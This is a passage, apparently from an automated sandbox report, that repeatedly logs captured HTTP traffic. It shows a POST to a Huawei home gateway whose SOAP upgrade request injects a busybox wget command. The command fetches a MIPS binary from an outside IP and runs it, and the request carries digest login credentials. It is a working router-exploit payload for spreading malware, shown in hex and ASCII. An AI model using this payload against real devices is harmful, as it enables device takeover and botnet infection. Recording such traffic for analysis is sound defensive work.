78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 